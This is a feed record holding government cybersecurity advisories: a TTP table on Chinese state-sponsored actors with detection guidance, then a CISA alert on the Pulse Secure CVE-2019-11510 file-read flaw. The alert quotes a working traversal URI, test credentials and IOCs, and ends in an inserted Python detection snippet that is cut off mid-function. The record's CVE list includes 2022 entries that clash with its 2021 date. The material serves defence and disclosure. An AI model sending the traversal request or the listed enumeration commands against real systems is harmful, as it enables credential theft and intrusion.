\n\n * Enable Protected Process Light for LSA on Windows 8.1 and Windows Server 2012 R2.\n\n| \n\nHarden:\n\n * Credential Hardening [[D3-CH](<https://d3fend.mitre.org/technique/d3f:CredentialHardening>)]\n\nDetect: \n\n * Process Analysis\n\n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]\n\n * System Call Analysis [[D3-SCA](<https://d3fend.mitre.org/technique/d3f:SystemCallAnalysis>)]\n\nIsolate: \n\n * Execution Isolation\n\n * Hardware-based Process Isolation [[D3-HBPI](<https://d3fend.mitre.org/technique/d3f:Hardware-basedProcessIsolation>)]\n\n * Mandatory Access Control [[D3-MAC](<https://d3fend.mitre.org/technique/d3f:MandatoryAccessControl>)] \n \n### Tactics: _Discovery_ [[TA0007](<https://attack.mitre.org/versions/v9/tactics/TA0007>)]\n\n_Table IX: Chinese state-sponsored cyber actors\u2019 Discovery TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nFile and Directory Discovery [[T1083](<https://attack.mitre.org/versions/v9/techniques/T1083>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using multiple implants with file system enumeration and traversal capabilities.\n\n| \n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. 
WMI and PowerShell should also be monitored.\n\n| \n\nDetect: \n\n * User Behavior Analysis\n\n * Job Function Access Pattern Analysis [[D3-JFAPA](<https://d3fend.mitre.org/technique/d3f:JobFunctionAccessPatternAnalysis>)]\n\n * Process Analysis \n\n * Database Query String Analysis [[D3-DQSA](<https://d3fend.mitre.org/technique/d3f:DatabaseQueryStringAnalysis>)]\n\n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]\n\n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)] \n \nPermission Group Discovery [[T1069](<https://attack.mitre.org/versions/v9/techniques/T1069>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using commands, including `net group` and `net localgroup`, to enumerate the different user groups on the target network. \n\n| \n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. 
Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.\n\n| \n\nDetect: \n\n * Process Analysis \n\n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]\n\n * System Call Analysis [[D3-SCA](<https://d3fend.mitre.org/technique/d3f:SystemCallAnalysis>)]\n\n * User Behavior Analysis [[D3-UBA](<https://d3fend.mitre.org/technique/d3f:UserBehaviorAnalysis>)] \n \nProcess Discovery [[T1057](<https://attack.mitre.org/versions/v9/techniques/T1057>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using commands, including `tasklist`, `jobs`, `ps`, or `taskmgr`, to reveal the running processes on victim devices.\n\n| \n\nNormal, benign system and network events that look like process discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell. \n\n| \n\nDetect: \n\n * Process Analysis \n\n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]\n\n * System Call Analysis [[D3-SCA](<https://d3fend.mitre.org/technique/d3f:SystemCallAnalysis>)]\n\n * User Behavior Analysis [[D3-UBA](<https://d3fend.mitre.org/technique/d3f:UserBehaviorAnalysis>)] \n \nNetwork Service Scanning [[T1046](<https://attack.mitre.org/versions/v9/techniques/T1046>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using `Nbtscan` and `nmap` to scan and enumerate target network information.\n\n| \n\n\u2022 Ensure that unnecessary ports and services are closed to prevent discovery and potential exploitation. 
\n\u2022 Use network intrusion detection and prevention systems to detect and prevent remote service scans such as `Nbtscan` or `nmap`. \n\u2022 Ensure proper network segmentation is followed to protect critical servers and devices to help mitigate potential exploitation.\n\n| \n\nDetect: \n\n * Network Traffic Analysis\n\n * Connection Attempt Analysis [[D3-CAA](<https://d3fend.mitre.org/technique/d3f:ConnectionAttemptAnalysis>)]\n\nIsolate:\n\n * Network Isolation\n\n * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)] \n \nRemote System Discovery [[T1018](<https://attack.mitre.org/versions/v9/techniques/T1018>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using Base-64 encoded commands, including `ping`, `net group`, and `net user` to enumerate target network information.\n\n| \n\nMonitor for processes that can be used to discover remote systems, such as `ping.exe` and `tracert.exe`, especially when executed in quick succession.\n\n| \n\nDetect: \n\n * Process Analysis \n\n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]\n\n * User Behavior Analysis\n\n * Job Function Access Pattern Analysis [[D3-JFAPA](<https://d3fend.mitre.org/technique/d3f:JobFunctionAccessPatternAnalysis>)] \n \n### Tactics: _Lateral Movement_ [[TA0008](<https://attack.mitre.org/versions/v9/tactics/TA0008>)]\n\n_Table X: Chinese state-sponsored cyber actors\u2019 Lateral Movement TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nExploitation of Remote Services [[T1210](<https://attack.mitre.org/versions/v9/techniques/T1210>)]\n\n| \n\nChinese state-sponsored cyber actors used valid accounts to log into a service specifically designed to accept remote connections, such as telnet, SSH, RDP, and 
Virtual Network Computing (VNC). The actor may then perform actions as the logged-on user.\n\nChinese state-sponsored cyber actors also used on-premises Identity and Access Management (IdAM) and federation services in hybrid cloud environments in order to pivot to cloud resources.\n\n| \n\n * Disable or remove unnecessary services.\n\n * Minimize permissions and access for service accounts.\n\n * Perform vulnerability scanning and update software regularly.\n\n * Use threat intelligence and open-source exploitation databases to determine services that are targets for exploitation.\n\n| \n\nDetect: \n\n * Network Traffic Analysis\n\n * Remote Terminal Session Detection [[D3-RTSD](<https://d3fend.mitre.org/technique/d3f:RemoteTerminalSessionDetection>)] \n\n * User Behavior Analysis [[D3-UBA](<https://d3fend.mitre.org/technique/d3f:UserBehaviorAnalysis>)]\n\nIsolate:\n\n * Execution Isolation\n\n * Mandatory Access Control [[D3-MAC](<https://d3fend.mitre.org/technique/d3f:MandatoryAccessControl>)] \n \n### Tactics: _Collection_ [[TA0009](<https://attack.mitre.org/versions/v9/tactics/TA0009>)]\n\n_Table XI: Chinese state-sponsored cyber actors\u2019 Collection TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nArchive Collected Data [[T1560](<https://attack.mitre.org/versions/v9/techniques/T1560>)]\n\n| \n\nChinese state-sponsored cyber actors used 
compression and encryption of exfiltration files into RAR archives and subsequently used cloud storage services for storage.\n\n| \n\n * Scan systems to identify unauthorized archival utilities or methods unusual for the environment.\n\n * Monitor command-line arguments for known archival utilities that are not common in the organization's environment.\n\n| \n\nDetect: \n\n * Process Analysis \n\n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]\n\n * Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]\n\nIsolate:\n\n * Execution Isolation\n\n * Executable Denylisting [[D3-EDL](<https://d3fend.mitre.org/technique/d3f:ExecutableDenylisting>)] \n \nClipboard Data [[T1115](<https://attack.mitre.org/versions/v9/techniques/T1115>)]\n\n| \n\nChinese state-sponsored cyber actors used RDP and executed `rdpclip.exe` to exfiltrate information from the clipboard.\n\n| \n\n * Access to the clipboard is a legitimate function of many applications on an operating system. If an organization chooses to monitor for this behavior, then the data will likely need to be correlated against other suspicious or non-user-driven activity (e.g. 
excessive use of `pbcopy/pbpaste` (Linux) or `clip.exe` (Windows) run by general users through command line).\n\n * If possible, disable use of RDP and other file sharing protocols to minimize a malicious actor's ability to exfiltrate data.\n\n| \n\nDetect:\n\n * Network Traffic Analysis\n\n * Remote Terminal Session Detection [[D3-RTSD](<https://d3fend.mitre.org/technique/d3f:RemoteTerminalSessionDetection>)]\n\nIsolate:\n\n * Network Isolation\n\n * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)]\n\n * Outbound Traffic Filtering [[D3-OTF](<https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering>)] \n \nData Staged [[T1074](<https://attack.mitre.org/versions/v9/techniques/T1074>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using the `mv` command to export files into a location, like a compromised Microsoft Exchange, IIS, or emplaced webshell prior to compressing and exfiltrating the data from the target network.\n\n| \n\nProcesses that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as using 7-Zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) 
to regularly check for compressed or encrypted data that may be indicative of staging.\n\n| \n\nDetect: \n\n * Process Analysis\n\n * File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)] \n \nEmail Collection [[T1114](<https://attack.mitre.org/versions/v9/techniques/T1114>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using the `New-MailboxExportRequest` PowerShell cmdlet to export target email boxes.\n\n| \n\n * Audit email auto-forwarding rules for suspicious or unrecognized rulesets.\n\n * Encrypt email using public key cryptography, where feasible.\n\n * Use MFA on public-facing mail servers.\n\n| \n\nHarden:\n\n * Credential Hardening\n\n * Multi-factor Authentication [[D3-MFA](<https://d3fend.mitre.org/technique/d3f:Multi-factorAuthentication>)]\n\n * Message Hardening\n\n * Message Encryption [[D3-MENCR](<https://d3fend.mitre.org/technique/d3f:MessageEncryption>)]\n\nDetect: \n\n * Process Analysis [[D3-PA](<https://d3fend.mitre.org/technique/d3f:ProcessAnalysis>)] \n \n### Tactics: _Command and Control_ [[TA0011](<https://attack.mitre.org/versions/v9/tactics/TA0011>)]\n\n_Table XII: Chinese state-sponsored cyber actors\u2019 Command and Control TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nApplication Layer Protocol [[T1071](<https://attack.mitre.org/versions/v9/techniques/T1071>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed:\n\n * Using commercial cloud storage services for command and control.\n\n * Using malware implants that use the Dropbox\u00ae API for C2 and a downloader that downloads and executes a payload using the Microsoft OneDrive\u00ae API.\n\n| \n\nUse network intrusion detection and prevention systems with network signatures to identify traffic for specific adversary 
malware.\n\n| \n\nDetect: \n\n * Network Traffic Analysis\n\n * Client-server Payload Profiling [[D3-CSPP](<https://d3fend.mitre.org/technique/d3f:Client-serverPayloadProfiling>)]\n\n * File Carving [[D3-FC](<https://d3fend.mitre.org/technique/d3f:FileCarving>)]\n\nIsolate: \n\n * Network Isolation\n\n * DNS Denylisting [[D3-DNSDL](<https://d3fend.mitre.org/technique/d3f:DNSDenylisting>)] \n \nIngress Tool Transfer [[T1105](<https://attack.mitre.org/versions/v9/techniques/T1105>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed importing tools from GitHub or infected domains to victim networks. In some instances, Chinese state-sponsored cyber actors used the Server Message Block (SMB) protocol to import tools into victim networks.\n\n| \n\n * Perform ingress traffic analysis to identify transmissions that are outside of normal network behavior. \n\n * Do not expose services and protocols (such as File Transfer Protocol [FTP]) to the Internet without strong business justification.\n\n * Use signature-based network intrusion detection and prevention systems to identify adversary malware coming into the network.\n\n| \n\nIsolate:\n\n * Network Isolation\n\n * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)] \n \nNon-Standard Port [[T1571](<https://attack.mitre.org/versions/v9/techniques/T1571>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using a non-standard SSH port to establish covert communication channels with VPS infrastructure. 
\n\n| \n\n * Use signature-based network intrusion detection and prevention systems to identify adversary malware calling back to C2.\n\n * Configure firewalls to limit outgoing traffic to only required ports based on the functions of that network segment.\n\n * Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port.\n\n| \n\nDetect: \n\n * Network Traffic Analysis\n\n * Client-server Payload Profiling [[D3-CSPP](<https://d3fend.mitre.org/technique/d3f:Client-serverPayloadProfiling>)]\n\n * Protocol Metadata Anomaly Detection [[D3-PMAD](<https://d3fend.mitre.org/technique/d3f:ProtocolMetadataAnomalyDetection>)]\n\nIsolate:\n\n * Network Isolation\n\n * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)]\n\n * Outbound Traffic Filtering [[D3-OTF](<https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering>)] \n \nProtocol Tunneling [[T1572](<https://attack.mitre.org/versions/v9/techniques/T1572>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using tools like dog-tunnel and `dns2tcp.exe` to conceal C2 traffic with existing network activity. \n\n| \n\n * Monitor systems for connections using ports/protocols commonly associated with tunneling, such as SSH (port 22). 
Also monitor for processes commonly associated with tunneling, such as Plink and the OpenSSH client.\n\n * Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards.\n\n * Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). \n\n| \n\nDetect: \n\n * Network Traffic Analysis\n\n * Protocol Metadata Anomaly Detection [[D3-PMAD](<https://d3fend.mitre.org/technique/d3f:ProtocolMetadataAnomalyDetection>)] \n \nProxy [[T1090](<https://attack.mitre.org/versions/v9/techniques/T1090>)]: \n\n * Multi-Hop Proxy [[T1090.003](<https://attack.mitre.org/versions/v9/techniques/T1090/003>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using a network of VPSs and small office and home office (SOHO) routers as part of their operational infrastructure to evade detection and host C2 activity. Some of these nodes operate as part of an encrypted proxy service to prevent attribution by concealing their country of origin and TTPs.\n\n| \n\n * Monitor traffic for encrypted communications originating from potentially breached routers to other routers within the organization. 
Compare the source and destination with the configuration of the device to determine if these channels are authorized VPN connections or other encrypted modes of communication.\n\n * Alert on traffic to known anonymity networks (such as Tor) or known adversary infrastructure that uses this technique.\n\n * Use network allow and blocklists to block traffic to known anonymity networks and C2 infrastructure.\n\n| \n\nDetect: \n\n * Network Traffic Analysis\n\n * Protocol Metadata Anomaly Detection [[D3-PMAD](<https://d3fend.mitre.org/technique/d3f:ProtocolMetadataAnomalyDetection>)]\n\n * Relay Pattern Analysis [[D3-RPA](<https://d3fend.mitre.org/technique/d3f:RelayPatternAnalysis>)]\n\nIsolate: \n\n * Network Isolation\n\n * Outbound Traffic Filtering [[D3-OTF](<https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering>)] \n \n### Appendix B: MITRE ATT&CK Framework \n\n\n\n_Figure 2: MITRE ATT&CK Enterprise tactics and techniques used by Chinese state-sponsored cyber actors ([Click here for the downloadable JSON file](<https://github.com/nsacyber/chinese-state-sponsored-cyber-operations-observed-ttps>).) _\n\n### Contact Information\n\nTo report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at [www.fbi.gov/contact-us/field](<http://www.fbi.gov/contact-us/field>), or the FBI\u2019s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at [CyWatch@fbi.gov](<mailto:CyWatch@fbi.gov>). 
When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact.\n\nTo request incident response resources or technical assistance related to these threats, contact CISA at [Central@cisa.dhs.gov](<mailto:Central@cisa.dhs.gov>).\n\nFor NSA client requirements or general cybersecurity inquiries, contact the NSA Cybersecurity Requirements Center at 410-854-4200 or [Cybersecurity_Requests@nsa.gov.](<mailto:Cybersecurity_Requests@nsa.gov>)\n\nMedia Inquiries / Press Desk: \n\u2022 NSA Media Relations, 443-634-0721, [MediaRelations@nsa.gov](<mailto:MediaRelations@nsa.gov>) \n\u2022 CISA Media Relations, 703-235-2010, [CISAMedia@cisa.dhs.gov](<mailto:CISAMedia@cisa.dhs.gov>) \n\u2022 FBI National Press Office, 202-324-3691, [npo@fbi.gov](<mailto:npo@fbi.gov>)\n\n### References\n\n[[1] FireEye: This is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits](<https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html>)\n\n### Revisions\n\nJuly 19, 2021: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-08-20T12:00:00", "type": "ics", "title": "Chinese State-Sponsored Cyber Operations: Observed TTPs", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, 
"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-5902", "CVE-2022-42475", "CVE-2022-47966"], "modified": "2021-08-20T12:00:00", "id": "AA21-200B", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-200b", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-23T07:43:42", "description": "### Summary\n\n_**Note: ** This Activity Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK\u00ae) framework. See the [ATT&CK for Enterprise](<https://attack.mitre.org/versions/v7/matrices/enterprise/> \"Enterprise Matrix\" ) framework for all referenced threat actor techniques and mitigations._\n\nThis Alert provides an update to Cybersecurity and Infrastructure Security Agency (CISA) [Alert AA20-010A: Continued Exploitation of Pulse Secure VPN Vulnerability](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-010a> \"Continued Exploitation of Pulse Secure VPN Vulnerability\" ), which advised organizations to immediately patch CVE-2019-11510\u2014an arbitrary file reading vulnerability affecting Pulse Secure virtual private network (VPN) appliances.[[1]](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101> \"Pulse Secure Community\" ) CISA is providing this update to alert administrators that threat actors who successfully exploited CVE-2019-11510 and stole a victim organization\u2019s credentials will still be able to access\u2014and move laterally through\u2014that organization\u2019s network after the organization has patched this vulnerability if the organization did not change 
those stolen credentials.\n\nThis Alert provides new detection methods for this activity, including a [CISA-developed tool](<https://github.com/cisagov/check-your-pulse> \"cisagov / check-your-pulse\" ) that helps network administrators search for indicators of compromise (IOCs) associated with exploitation of CVE-2019-11510. This Alert also provides mitigations for victim organizations to recover from attacks resulting from CVE-2019-11510. CISA encourages network administrators to remain aware of the ramifications of exploitation of CVE-2019-11510 and to apply the detection measures and mitigations provided in this report to secure networks against these attacks.\n\nFor a downloadable copy of IOCs, see STIX file.\n\n#### **Background**\n\nCISA has conducted multiple incident response engagements at U.S. Government and commercial entities where malicious cyber threat actors have exploited CVE-2019-11510\u2014an arbitrary file reading vulnerability affecting Pulse Secure VPN appliances\u2014to gain access to victim networks. Although Pulse Secure released patches for CVE-2019-11510 in April 2019,[[2]](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101> \"Pulse Secure Community\" ) CISA has observed incidents where compromised Active Directory credentials were used months after the victim organization patched their VPN appliance.\n\n### Technical Details\n\nCISA determined that cyber threat actors have been able to obtain plaintext Active Directory credentials after gaining _Initial Access_ [[TA0001]](<https://attack.mitre.org/versions/v7/tactics/TA0001/> \"Initial Access\" ) to a victim organization\u2019s network via VPN appliances. 
Cyber threat actors used these _Valid Accounts_ [[T1078]](<https://attack.mitre.org/versions/v7/techniques/T1078/> \"Valid Accounts\" ) in conjunction with:\n\n * _External Remote Services_ [[T1133]](<https://attack.mitre.org/versions/v7/techniques/T1133> \"External Remote Services\" ) for access,\n * _Remote Services_ [[T1021]](<https://attack.mitre.org/versions/v7/techniques/T1021> \"Remote Services\" ) for _Lateral Movement_ [[TA0008]](<https://attack.mitre.org/versions/v7/tactics/TA0008/> \"Lateral Movement\" ) to move quickly throughout victim network environments, and\n * _Data Encrypted for Impact_ [[T1486]](<https://attack.mitre.org/versions/v7/techniques/T1486> \"Data Encrypted for Impact\" ) for impact, as well as\n * _Exfiltration_ [[TA0010]](<https://attack.mitre.org/versions/v7/tactics/TA0010/> \"Exfiltration\" ) and sale of the data.\n\n### Initial Access\n\nCVE-2019-11510 is a pre-authentication arbitrary file read vulnerability affecting Pulse Secure VPN appliances. A remote attacker can exploit this vulnerability to request arbitrary files from a VPN server. The vulnerability occurs because directory traversal is hard coded to be allowed if the path contains `dana/html5acc/`.[[3]](<https://twitter.com/XMPPwocky/status/1164874297690611713/photo/1> \"Twitter\" ),[[4]](<https://opensecurity.global/forums/topic/184-pulse-secure-ssl-vpn-vulnerability-being-exploited-in-wild/?do=findComment&comment=848> \"184 Pulse Secure SSL VPN\" ) For example, a malicious cyber actor can obtain the contents of `/etc/passwd` [[5]](<https://github.com/BishopFox/pwn-pulse/blob/master/pwn-pulse.sh> \"BishopFox / pwn-pulse\" ) by requesting the following uniform resource identifier (URI):\n\n`https://vulnvpn.example[.]com/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/`\n\nObtaining the contents of `/etc/passwd` gives the attacker access to basic information about local system accounts. 
This request was seen in the proof of concept (POC) code for this exploit on [Github](<https://github.com/BishopFox/pwn-pulse/blob/master/pwn-pulse.sh> \"BishopFox / pwn-pulse\" ). An attacker can also leverage the vulnerability to access other files that are useful for remote exploitation. By requesting the data.mdb object, an attacker can leak plaintext credentials of enterprise users.[[6]](<https://www.exploit-db.com/exploits/47297> \"Pulse Secure 8.1R15.1/8.2/8.3/9.0 SSL VPN - Arbitrary File Disclosure \\(Metasploit\\)\" ),[[7]](<https://twitter.com/alyssa_herrera_/status/1164089995193225216?s=11> \"Twitter\" ),[[8]](<https://opensecurity.global/forums/topic/184-pulse-secure-ssl-vpn-vulnerability-being-exploited-in-wild/?do=findComment&comment=848> \"184 Pulse Secure SSL VPN Vulnerability Being Exploited in the Wild\" )\n\nOpen-source reporting indicates that cyber threat actors can exploit CVE-2019-11510 to retrieve encrypted passwords;[[9]](<https://opensecurity.global/forums/topic/184-pulse-secure-ssl-vpn-vulnerability-being-exploited-in-wild/?tab=comments#comment-887> \"184 Pulse Secure SSL VPN Vulnerability Being Exploited in the Wild\" ) however, CISA has not observed this behavior. By reviewing victim VPN appliance logs, CISA has noted cyber threat actors crafting requests that request files that allow for _Credential Dumping_ [[T1003]](<https://attack.mitre.org/versions/v7/techniques/T1003> \"OS Credential Dumping\" ) plaintext passwords from the VPN appliance.\n\n### Test Environment\n\nTo confirm the open-source reporting and validate what the cyber threat actors had access to, CISA used a test environment to send crafted requests. CISA used requests found both in proof-of-concept, open-source code and in requests from the logs of compromised victims. By doing so, CISA confirmed that plaintext Active Directory credentials were leaked and that it was possible to leak the local admin password to the VPN appliance. 
(See figure 1.)

##### Figure 1: Exploitation of the VPN appliance leading to plaintext local admin credentials

CISA’s test environment consisted of a domain controller (DC) running Windows Server 2016, an attacker machine, and a Pulse Secure VPN appliance version 9.0R3 (build 64003). CISA connected the attacker machine to the external interface of the Pulse Secure VPN appliance and the DC to the internal interface.

CISA created three accounts for the purpose of validating the ability to compromise them by exploiting CVE-2019-11510.

 * Local Pulse Secure Admin account
   * Username: `admin`; Password: `pulse-local-password`
 * Domain Administrator Account
   * Username: `Administrator`; Password: `domain-admin-password1`
 * CISA-test-user Account
   * Username: `cisa-test-user`; Password: `Use_s3cure_passwords`

After creating the accounts, CISA joined the VPN appliance to the test environment domain, making a point not to cache the domain administrator password. (See figure 2.)

##### Figure 2: VPN appliance joined to the domain without caching the domain administrator password

CISA used a similar file inclusion to test the ability to _Credential Dump_ [[T1003]](<https://attack.mitre.org/versions/v7/techniques/T1003> "OS Credential Dumping" ) the domain administrator password. CISA determined it was possible to leak the domain administrator password that was used to join the device to the domain without saving the credentials. Refer to figure 3 for the URI string tested by CISA.

##### Figure 3: Exploitation of the VPN appliance leading to cleartext domain admin credentials

Next, CISA validated the ability to _Credential Dump_ [[T1003]](<https://attack.mitre.org/versions/v7/techniques/T1003> "OS Credential Dumping" ) a user password from the VPN appliance.
To do this, CISA created a _user realm_ (Pulse Secure configuration terminology) and configured its roles/resource groups to allow for Remote Desktop Protocol (RDP) over HTML5 (Apache Guacamole). After using the new user to remotely access an internal workstation over RDP, CISA used a crafted request (see figure 4) to leak the credentials from the device. (**Note:** the path to stored credentials is publicly available.)[[10]](<https://twitter.com/alyssa_herrera_/status/1164089995193225216?s=11>)

##### Figure 4: Exploitation of the VPN appliance leading to plaintext user credentials

This test confirmed CISA’s suspicion that threat actors had access to each of the various compromised environments.

### Cyber Threat Actor Behavior in Victim Network Environments

CISA observed—once credentials were compromised—cyber threat actors accessing victim network environments via the Pulse Secure VPN appliances. Cyber threat actors used _Connection Proxies_ [[T1090]](<https://attack.mitre.org/versions/v7/techniques/T1090> "Proxy" )—such as Tor infrastructure and virtual private servers (VPSs)—to minimize the chance of detection when they connected to victim VPN appliances.

Using traditional host-based analysis, CISA identified the following malicious cyber actor actions occurring in a victim’s environment:

 * Creating persistence via scheduled tasks/remote access trojans
 * Amassing files for exfiltration
 * Executing ransomware on the victim’s network environment

By correlating these actions with the connection times and user accounts recorded in the victim’s Pulse Secure `.access` logs, CISA was able to identify unauthorized threat actor connections to the victim’s network environment. CISA was then able to use these Internet Protocol (IP) addresses and user-agents to identify unauthorized connections to the network environments of other victims.
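To make the log review described here, and the traversal mechanism described in the Initial Access section, concrete, the following is an added Python example; it is not CISA's check-your-pulse tool and not code from this advisory. It assumes a simplified, constructed log layout of `client-ip "user-agent" METHOD target` per line rather than the real Pulse Secure `.access` format, and it assumes that legitimate request paths on the appliance live under `/dana`; both are simplifying assumptions for the demo. It shows why the URI quoted in the Initial Access section reads `/etc/passwd` once the `..` segments are collapsed, flags requests that combine traversal with the `dana/html5acc/` marker or contain the `../../../data` string from the Post-Compromise Detection section, and marks the user agents listed under Indicators of Compromise.

```python
import posixpath
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed sample lines in a simplified 'ip "user-agent" METHOD target' layout.
# This is NOT the real Pulse Secure .access log format (assumption for the demo);
# the first request is the /etc/passwd URI quoted in the Initial Access section.
SAMPLE_LOG = """\
203.0.113.7 "Mozilla/5.0 (Windows NT 6.1; rv:60.0) Gecko/20100101 Firefox/60.0" GET /dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/
198.51.100.23 "Mozilla/5.0 (X11; Linux x86_64) Gecko/20100101 Firefox/72.0" GET /dana-na/auth/url_default/welcome.cgi
203.0.113.7 "Mozilla/5.0 (Windows NT 6.1; rv:60.0) Gecko/20100101 Firefox/60.0" GET /dana-na/../dana/html5acc/guacamole/../../../data
192.0.2.44 "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" GET /dana-na/auth/url_default/welcome.cgi
"""

# User agents CISA lists under Indicators of Compromise (the advisory defangs
# the Chrome version as 55[.]0; it is written plainly here so it can be matched).
IOC_USER_AGENTS = {
    "Mozilla/5.0 (Windows NT 6.1; rv:60.0) Gecko/20100101 Firefox/60.0",
    "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) "
    "Chrome/55.0.2883.87 Safari/537.36",
}

# The path fragment for which the appliance hard-codes traversal as allowed.
BYPASS_MARKER = "dana/html5acc/"
# Legitimate appliance content is assumed to live under /dana... (demo assumption).
WEB_TREE_PREFIX = "/dana"

LINE_RE = re.compile(r'^(?P<ip>\S+) "(?P<ua>[^"]*)" (?P<method>[A-Z]+) (?P<target>\S+)$')


def normalize_path(raw_path):
    """Collapse '.' and '..' segments the way the file system will, so the file
    a request really resolves to becomes visible (extra '..' at '/' are dropped)."""
    return posixpath.normpath(raw_path)


def classify_request(target):
    """Return the reasons a request target looks like CVE-2019-11510 abuse."""
    path = urlsplit(target).path  # ignore the ?/dana/html5acc/guacamole/ query part
    reasons = []
    if BYPASS_MARKER in path and "/../" in path:
        reasons.append("traversal combined with the dana/html5acc/ bypass marker")
    if "../../../data" in path:
        reasons.append("contains the '../../../data' string CISA recommends searching for")
    resolved = normalize_path(path)
    if not resolved.startswith(WEB_TREE_PREFIX):
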